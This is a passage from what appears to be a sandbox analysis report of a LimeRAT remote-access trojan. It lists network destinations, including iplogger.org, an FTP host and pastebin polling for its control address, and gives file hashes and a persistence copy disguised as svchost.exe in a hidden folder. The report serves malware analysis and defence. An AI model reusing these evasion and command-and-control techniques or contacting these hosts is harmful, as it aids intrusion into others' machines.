US | 8.8.8.8:53 | tse1.mm.bing.net | udp | 1
US | 150.171.27.10:443 | tse1.mm.bing.net | tcp | 2
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp | 1
US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp | 1

Rows are listed in order of first appearance; Count is the number of identical rows in the original capture. The in-addr.arpa lookups are the sandbox's reverse-DNS resolution of the other destinations, and the bing.com and example.com traffic is typical Windows background activity. The destinations worth pivoting on are iplogger.org, ftp.encompossoftware.com (control connection on 21 plus a passive data port), the repeated HTTPS polling of pastebin.com, which matches the "Legitimate hosting services abused" signature above and LimeRAT's habit of fetching its C2 address from a paste, and the two connections with no associated hostname.

Files

memory/1932-0-0x00007FFBA4EC3000-0x00007FFBA4EC5000-memory.dmp

memory/1932-1-0x000001715BCE0000-0x000001715BD22000-memory.dmp

memory/4556-7-0x000001F245120000-0x000001F245142000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2got23vd.05h.ps1
(PowerShell's own AppLocker policy probe, written whenever powershell.exe starts; not dropped by the sample)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4556-12-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

memory/4556-13-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

memory/4556-14-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

memory/4556-17-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

memory/1932-19-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp

C:\Users\Admin\Branding\svchost.exe
(same SHA256 as the submitted Client.exe: the sample copies itself unchanged into the hidden Branding directory under a service-like name, so one hash covers both the original and the persisted copy)

MD5 ccc910296b7389ba076ffeed54ec400b
SHA1 6dc995e663fd4c84d35ace40733df462f3282340
SHA256 ebf854c44cf0407faa99b0a60ced1b4805c33249cbc0828554cf1aef7b1c1c79
SHA512 45ef0543176424185603492d7c9043f6b28b30611776d04606d4d041f385ab81f4c814d107b8d354baa3c43402be82fe82658fbf7348b9d89a9c0cde1e40b86c

memory/1932-31-0x00007FFBA4EC0000-0x00007FFBA5981000-memory.dmp